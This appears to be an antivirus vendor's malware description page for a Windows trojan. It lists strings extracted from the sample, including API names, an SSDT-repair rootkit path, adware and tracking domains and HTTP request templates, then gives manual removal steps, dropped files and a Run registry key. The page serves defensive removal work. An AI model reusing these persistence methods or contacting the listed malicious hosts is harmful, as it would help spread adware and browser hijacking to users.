dnsapi.dll

\svchost.exe

kernel32.dll

InternetOpenUrlA

wininet.dll

c:\2.exe

GetUrlCacheEntryInfoA

URLDownloadToCacheFileA

urlmon.dll

Shell32.dll

h.rdata

H.data

.reloc

rtyutjgkjguityutuczxcvasdfawerrrwrw 0x%x

assdfasdfhjlkhjklyuioyuiodwe 0x%x

c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb

ntoskrnl.exe

>$>)>2>9>

relo type %d found at .%X

Possibly KiServiceLimit==X

0x%x 0xX

&KiServiceTable==X

ntdll.dll

\\.\Dark2118

\drivers\PCIDump.sys

lasrse.exe

cnzz.9ycj.com

kmon.dll

SYSTEM\CurrentControlSet\Services\%s

%s SP%d

%u.193.%d.%d

#%d<<<<<I@C<<<<<%s!

GET %s HTTP/1.1

Host: %s:%d

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)

Referer: hXXp://%s

hXXp://

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

Kernel32.dll

\Program Files\Internet Explorer\iexplore.exe

\explorer.exe

21.0.0.17

ravcopy.exe

668531044687500

svchost.exe_3568_rwx_00400000_00068000:

`.rsrc

u$SShe

SSSSh

File%d

CCmdTarget

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

MSWHEEL_ROLLMSG

MAPI32.DLL

MSH_SCROLL_LINES_MSG

CMDIChildWnd

CMDIFrameWnd

%*.*f

{X-X-X-XX-XXXXXX}

CNotSupportedException

CHttpConnection

CHttpFile

hXXp://

HTTP/1.0

WININET.DLL

GDI32.DLL

ddeexec

%s\ShellNew

%s\DefaultIcon

%s\shell\printto\%s

%s\shell\print\%s

%s\shell\open\%s

ole32.dll

Broken pipe

Inappropriate I/O control operation

Operation not permitted

__MSVCRT_HEAP_SELECT

user32.dll

ETAPI32.dll

DSound.dll

winmm.dll

\set.ini

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon/3.0)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/24.0

autoie.xml

window.open=null

refurl

\autoie.xml

\replace.xml

aquametron.com

it885.com.cn

wlkan.cn

fxxx114.com

niudoudou.com

floodad.com

hXXp://VVV.it885.com.cn/web/xml_lost_ad.asp?ad_url=

.PAVCInternetException@@

index.dat

desktop.ini

%s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s at offset %d unterminated

Incorrect %s at offset %d

.?AVCCmdTarget@@

.PAVCException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCOleException@@

.PAVCObject@@

.PAVCOleDispatchException@@

.?AVCMDIFrameWnd@@

.?AVCMDIChildWnd@@

.PAVCArchiveException@@

.?AVCToolCmdUI@@

.?AVCStatusCmdUI@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.PAVCNotSupportedException@@

.?AVCNotSupportedException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.PAVCResourceException@@

.PAVCFileException@@

zcÁ

windows

KERNEL32.DLL

%System%\svchost.exe

GetCPInfo

RegCreateKeyA

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

RegOpenKeyA

RegCloseKey

GetViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

UrlMkSetSessionOption

CreateDialogIndirectParamA

UnhookWindowsHookEx

GetKeyState

SetWindowsHookExA

EnumWindows

EnumDesktopWindows

EnumChildWindows

DeleteUrlCacheEntry

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

HttpQueryInfoA

HttpSendRequestA

HttpOpenRequestA

InternetCanonicalizeUrlA

InternetCrackUrlA

.text

`.rdata

@.data

.rsrc

xKey

WUrlMkS)O

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

OLEAUT32.dll

oledlg.dll

OLEPRO32.DLL

SHELL32.dll

urlmon.dll

USER32.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WSOCK32.dll

Load URL

Windows

(*.*)

1, 0, 0, 0

AuotIE.exe

AutoIE.exe

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

mstsc.exe:1216
spoolsc.exe:828
ieLock.exe:2548
1210828.exe:720
qqz.exe:1912
misse.exe:1928
%original file name%.exe:512
lasrse.exe:2444
lasrse.exe:3460
mstsv.exe:596
NOTEPAD.EXE:2604
secie.exe:2300
regsvr32.exe:3836
dkdez.exe:2308
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (745 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk (763 bytes)
%Program Files%\QQNews\QQNews.exe (58 bytes)
%System%\rasman.dll (1529 bytes)
%System%\rasmanOrg.dll (61 bytes)
%Documents and Settings%\%current user%\Application Data\1210828.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mstsc.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kisse.exe (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\alg.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mstsv.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope12.bat (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\secie.exe (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lsass.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spoolsv.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\svchost.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\services.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serverc.exe (1686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\misse.exe (278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\explorer.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winlogon.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qqz.exe (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dkdez.exe (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spoolsc.exe (28 bytes)
%WinDir%\Helps\ieLock.dll (69 bytes)
%WinDir%\Helps\ielock.ini (72 bytes)
%WinDir%\Helps\ieLock.exe (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope15.bat (44 bytes)
%System%\lasrse.exe (31 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"QQNews" = "%Program Files%\QQNews\QQNews.exe /r"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Crypt.CG_1e098dc6ef

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Crypt.CG_1e098dc6ef

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet